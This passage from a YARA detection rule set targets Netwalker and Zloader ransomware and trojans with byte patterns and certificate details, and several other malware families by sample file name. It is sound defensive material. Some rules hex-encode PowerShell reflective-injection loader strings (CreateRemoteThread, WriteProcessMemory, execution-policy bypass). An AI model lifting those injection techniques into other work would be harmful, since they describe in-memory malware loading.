?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? }
  condition:
    uint16(0) == 23117 and any of ($pattern*)
}

rule netwalker_signed {
  meta:
    description = "Rule to detect Netwalker ransomware digitally signed."
    author = "Marc Rivero | McAfee ATR Team"
    reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html"
    date = "2020-03-30"
    note = "The rule will hit also some Dridex samples digitally signed"
  condition:
    uint16(0) == 23117 and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "/CN=EWBTCAXQKUMDTHCXCZ" and pe.signatures[i].serial == "17:16:bb:93:fb:a9:a2:41:ba:a8:2e:c7:5e:ff:0c" or pe.signatures[i].thumbprint == "a4:28:e9:4a:61:3a:1f:cf:ff:08:bf:e7:61:51:64:31:1a:6f:87:bc")
}

rule Netwalker {
  meta:
    description = "Rule based on code overlap in RagnarLocker ransomware"
    author = "McAfee ATR team"
    date = "2020-06-14"
    rule_version = "v1"
    malware_type = "ransomware"
    actor_group = "Unknown"
  strings:
    $0 = { C8 8B F2 8B 43 30 F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 89 4D 68 13 F2 89 75 6C 8B 43 38 F7 6F 38 8B C8 8B F2 8B 43 28 F7 6F 48 03 C8 8B 43 48 13 F2 F7 6F 28 03 C8 8B 43 30 13 F2 F7 6F 40 0F A4 CE }
    $1 = { 89 54 24 14 89 54 24 10 8B EA 8B DA 8B FA 42 3C 22 74 7C 3C 5C 75 58 8A 02 3C 5C 74 4F 3C 2F 74 4B 3C 22 74 47 3C 62 75 07 8D 57 02 B0 08 EB 3F 3C 66 75 07 8D 53 02 B0 0C EB 34 3C 6E 75 07 8D 55 02 B0 0A EB 29 3C 72 75 0B 8B 54 24 10 B0 0D 83 C2 02 EB 1A 3C 74 75 0B 8B 54 24 14 B0 09 83 C2 }
    $2 = { C8 89 4D 70 13 F2 89 75 74 8B 43 38 F7 6F 40 8B C8 8B F2 8B 43 40 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 6F 30 03 C8 89 4D 78 13 F2 89 75 7C 8B 43 48 F7 6F 38 8B C8 8B F2 8B 43 38 F7 6F 48 03 C8 8B 43 40 13 F2 F7 6F 40 0F A4 CE }
    $3 = { C0 74 39 47 3C 2F 75 E3 80 FB 2A 74 DE EB 2D 8D 4A BF 8D 42 20 80 F9 19 0F B6 D8 0F B6 C2 8A D6 0F 47 D8 8A C6 04 20 80 EA 41 0F B6 C8 80 FA 19 0F B6 C6 0F 47 C8 3A CB 75 4B 46 47 8A 16 84 D2 }
    $4 = { 8B 43 30 13 F2 F7 6F 08 03 C8 8B 43 20 13 F2 F7 6F 18 03 C8 8B 03 13 F2 F7 6F 38 03 C8 8B 43 08 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 2F 03 C8 89 4D 38 13 F2 89 75 3C 8B 43 38 F7 6F 08 8B C8 }
    $5 = { F7 31 01 32 0E 32 21 32 34 32 98 32 E3 32 0C 33 2D 33 47 33 64 33 83 33 91 33 A8 33 BD 33 05 34 63 34 7C 34 54 35 64 35 83 35 AE 36 C3 36 29 37 E9 37 9A 39 BA 39 0A 3A 20 3A 44 3A 18 3B 2B 3B }
    $6 = { 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 03 C8 89 4D 60 13 F2 89 75 64 }
  condition:
    uint16(0) == 23117 and uint32(uint32(60)) == 17744 and all of them
}

rule win_netwalker_reflective_dll_injection_decoded {
  meta:
    description = "Rule to detect Reflective DLL Injection Powershell Script dropping Netwalker, after hexadecimal decoded and xor decrypted "
    author = "McAfee ATR Team"
    date = "2020-05-28"
    rule_version = "v1"
    malware_type = "ransomware"
    reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/ | https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/"
    hash = "fd29001b8b635e6c51270788bab7af0bb5adba6917c278b93161cfc2bc7bd6ae"
  strings:
    $api0 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 53 65 74 4C 61 73 74 45 72 72 6F 72 20 3D 20 74 72 75 65 2C 20 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 56 69 72 74 75 61 6C 41 6C 6C 6F 63 22 29 5D }
    $api1 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 53 65 74 4C 61 73 74 45 72 72 6F 72 20 3D 20 74 72 75 65 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 22 29 5D }
    $api2 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 53 65 74 4C 61 73 74 45 72 72 6F 72 20 3D 20 74 72 75 65 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 4C 6F 61 64 4C 69 62 72 61 72 79 41 22 29 5D }
    $api3 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 53 65 74 4C 61 73 74 45 72 72 6F 72 20 3D 20 74 72 75 65 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 57 72 69 74 65 50 72 6F 63 65 73 73 4D 65 6D 6F 72 79 22 29 5D }
    $api4 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 53 65 74 4C 61 73 74 45 72 72 6F 72 20 3D 20 74 72 75 65 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 56 69 72 74 75 61 6C 46 72 65 65 22 29 5D }
    $api5 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 53 65 74 4C 61 73 74 45 72 72 6F 72 20 3D 20 74 72 75 65 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 22 29 5D }
    $api6 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 53 65 74 4C 61 73 74 45 72 72 6F 72 20 3D 20 74 72 75 65 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 43 6C 6F 73 65 48 61 6E 64 6C 65 22 29 5D }
    $api7 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 20 53 65 74 4C 61 73 74 45 72 72 6F 72 3D 74 72 75 65 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 56 69 72 74 75 61 6C 41 6C 6C 6F 63 45 78 22 29 5D }
    $api8 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 20 53 65 74 4C 61 73 74 45 72 72 6F 72 3D 74 72 75 65 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 45 78 22 29 5D }
    $api9 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 20 53 65 74 4C 61 73 74 45 72 72 6F 72 20 3D 20 74 72 75 65 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 4F 70 65 6E 50 72 6F 63 65 73 73 22 29 5D }
    $api10 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 22 29 5D }
    $artifact0 = { 5B 44 6C 6C 49 6D 70 6F 72 74 28 22 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 22 2C 45 6E 74 72 79 50 6F 69 6E 74 20 3D 20 22 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 22 29 5D }
    $artifact1 = { 53 79 73 74 65 6D 2E 52 75 6E 74 69 6D 65 2E 49 6E 74 65 72 6F 70 53 65 72 76 69 63 65 73 2E 4D 61 72 73 68 61 6C 5D 3A 3A 50 74 72 54 6F 53 74 72 75 63 74 75 72 65 }
    $artifact2 = { 53 79 73 74 65 6D 2E 52 75 6E 74 69 6D 65 2E 49 6E 74 65 72 6F 70 53 65 72 76 69 63 65 73 2E 4D 61 72 73 68 61 6C 5D 3A 3A 52 65 61 64 49 6E 74 31 36 }
    $artifact3 = { 65 6E 76 3A 57 49 4E 44 49 52 5C 73 79 73 77 6F 77 36 34 5C 77 69 6E 64 6F 77 73 70 6F 77 65 72 73 68 65 6C 6C 5C 76 31 2E 30 5C 70 6F 77 65 72 73 68 65 6C 6C 2E 65 78 65 22 20 2D 4E 6F 6E 49 6E 74 65 72 61 63 74 69 76 65 20 2D 4E 6F 50 72 6F 66 69 6C 65 20 2D 65 78 65 63 20 62 79 70 61 73 73 }
    $artifact4 = { 65 6E 76 3A 57 49 4E 44 49 52 5C 73 79 73 77 6F 77 36 34 5C 77 69 6E 64 6F 77 73 70 6F 77 65 72 73 68 65 6C 6C 5C 76 31 2E 30 5C 70 6F 77 65 72 73 68 65 6C 6C 2E 65 78 65 22 20 2D 4E 6F 6E 49 6E 74 65 72 61 63 74 69 76 65 20 2D 4E 6F 50 72 6F 66 69 6C 65 20 2D 65 78 65 63 20 62 79 70 61 73 73 20 2D 66 69 6C 65 }
    $artifact5 = { 5B 50 61 72 61 6D 65 74 65 72 28 50 6F 73 69 74 69 6F 6E 20 3D 20 30 20 2C 20 4D 61 6E 64 61 74 6F 72 79 }
    $artifact6 = { 5B 50 61 72 61 6D 65 74 65 72 28 50 6F 73 69 74 69 6F 6E 20 3D 20 31 20 2C 20 4D 61 6E 64 61 74 6F 72 79 }
    $artifact7 = { 2D 45 78 65 63 75 74 69 6F 6E 50 6F 6C 69 63 79 20 42 79 50 61 73 73 20 2D 4E 6F 4C 6F 67 6F 20 2D 4E 6F 6E 49 6E 74 65 72 61 63 74 69 76 65 20 2D 4E 6F 50 72 6F 66 69 6C 65 20 2D 4E 6F 45 78 69 74 }
    $artifact8 = { 72 65 74 75 72 6E 20 5B 42 69 74 43 6F 6E 76 65 72 74 65 72 5D 3A 3A 54 6F 49 6E 74 36 34 }
  condition:
    6 of ($api*) or ((3 of ($artifact*)))
}

rule win_mal_Zloader {
  meta:
    author = "RussianPanda"
    description = "Detects Zloader and other Zloader modules that employ the same encryption"
    date = "3/10/2024"
  strings:
    $s1 = { 8B 45 ?? 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C1 8B 45 ?? 99 F7 F9 8B 45 ?? 48 63 D2 48 8D 0D ?? ?? ?? 00 0F BE 0C 11 31 C8 88 C2 48 8B 45 F0 48 63 4D }
    $s2 = { 48 63 C9 44 0F B6 04 08 48 8B 45 E8 8B 4D D4 0F B6 14 08 44 31 C2 88 14 08 8B 45 D4 }
    $s3 = { B9 11 00 00 00 99 F7 F9 8B [0-20] 31 C8 88 C2 }
    $s4 = { 8B 45 ?? BE 11 00 00 00 99 F7 [0-20] 83 F6 FF }
  condition:
    uint16(0) == 23117 and any of them
}

rule virus_eicar {
  meta:
    description = "Detects eicar virus files"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path1 = "eicar.com.txt"
    $path2 = "eicarcom2.zip"
  condition:
    ($path1) or ($path2)
}

rule worm_loveletter_scriptworm {
  meta:
    description = "Detects vbs worm iloveyou"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "ILOVEYOU.vbs"
  condition:
    ($path)
}

rule trojan_hacktool_boxter_darius {
  meta:
    description = "Detects Invoke-ConPtyShell.ps1 trojan"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Invoke-ConPtyShell.ps1"
  condition:
    ($path)
}

rule trojan_disabler_cdeject_L0Lz_bat {
  meta:
    description = "Detects L0Lz.bat trojan"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "L0Lz.bat"
  condition:
    ($path)
}

rule linux_trojan_gafgyt_mirai {
  meta:
    description = "Detects linux trojan Multiverze"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Linux.Trojan.Multiverze.elf.x86"
  condition:
    ($path)
}

rule virus_madman {
  meta:
    description = "Detects virus MadMan.exe"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "MadMan.exe"
  condition:
    ($path)
}

rule virus_melissa_w97m {
  meta:
    description = "Detects virus Melissa.doc"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Melissa.doc"
  condition:
    ($path)
}

rule trojan_python_necrobot {
  meta:
    description = "Detects trojan python necrobot"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Py.Trojan.NecroBot.py"
  condition:
    ($path)
}

rule trojan_java_fractureiser {
  meta:
    description = "Detects trojan java fractureiser"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Trojan.Java.Fractureiser.MTB.jar"
  condition:
    ($path)
}

rule trojan_xcsset_xtesc {
  meta:
    description = "Detects trojan xtesc"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "TrojanSpy.MacOS.XCSSET.A.bin"
  condition:
    ($path)
}

rule miner_zojfor_shell {
  meta:
    description = "Detects zojfor shell miner"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Txt.Malware.Sustes.sh"
  condition:
    ($path)
}

rule trojan_zojfor_shell {
  meta:
    description = "Detects unix shell trojan zojfor"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Unix.Downloader.Rocke.sh"
  condition:
    ($path)
}

rule trojan_kaiji_ddos {
  meta:
    description = "Detects unix trojan kaiji ddos"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Unix.Malware.Kaiji.elf.arm"
  condition:
    ($path)
}

rule trojan_mirai_bootnet_mk68k {
  meta:
    description = "Detects unix trojan mirai bootnet"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Unix.Trojan.Mirai.elf.m68k"
  condition:
    ($path)
}

rule trojan_mirai_gafgyt_mips {
  meta:
    description = "Detects unix trojan mirai"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Unix.Trojan.Mirai.elf.mips"
  condition:
    ($path)
}

rule trojan_gafgyt_mirai_ppc {
  meta:
    description = "Detects unix trojan mirai"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Unix.Trojan.Mirai.elf.ppc"
  condition:
    ($path)
}

rule trojan_mirai_gafgyt_sparc {
  meta:
    description = "Detects unix trojan mirai"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Unix.Trojan.Mirai.elf.sparc"
  condition:
    ($path)
}

rule trojan_mirai_gafgyt_x86_64 {
  meta:
    description = "Detects unix trojan mirai"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Unix.Trojan.Mirai.elf.x86_64"
  condition:
    ($path)
}

rule trojan_dofloo_rootkit_arm {
  meta:
    description = "Detects unix trojan rootkit on arm"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Unix.Trojan.Spike.elf.arm"
  condition:
    ($path)
}

rule virus_walker_abraxas {
  meta:
    description = "Detects virus walker/abraxas"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Walker.com"
  condition:
    ($path)
}

rule trojan_wannacryptor_wannacry {
  meta:
    description = "Detects wannacry trojan or ransomware files"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "WannaCry.exe"
  condition:
    ($path)
}

rule Malware_Generic_Script_Save_169b6505 {
  meta:
    description = "Detects generic malware"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Win.Trojan.Perl.perl"
  condition:
    ($path)
}

rule trojan_esls_zloader {
  meta:
    description = "Detects zloader trojan"
    author = "Deepfence"
    date = "2025-04-10"
  strings:
    $path = "Zloader.xlsm"
  condition:
    ($path)
}